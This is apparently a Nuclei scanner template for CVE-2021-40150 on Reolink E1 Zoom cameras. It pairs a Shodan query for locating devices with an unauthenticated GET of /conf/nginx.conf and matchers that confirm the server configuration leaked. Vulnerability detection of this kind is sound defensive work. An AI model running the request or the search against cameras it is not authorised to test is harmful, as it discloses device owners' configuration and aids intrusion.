id: CVE-2021-40150 info: name: Reolink E1 Zoom Camera - Information Disclosure author: For3stCo1d severity: high description: | The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An unauthenticated attacker can abuse this with network-level access to the camera to download the entire NGINX/FastCGI configurations. reference: - https://dl.packetstormsecurity.net/2206-exploits/reolinke1config-disclose.txt - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40150.txt - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40150 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-40150 cwe-id: CWE-552 metadata: shodan-query: http.title:"Reolink" verified: "true" tags: cve,cve2021,reolink,camera,exposure,iot requests: - method: GET path: - "{{BaseURL}}/conf/nginx.conf" matchers-condition: and matchers: - type: word words: - "server" - "listen" - "fastcgi" condition: and - type: status status: - 200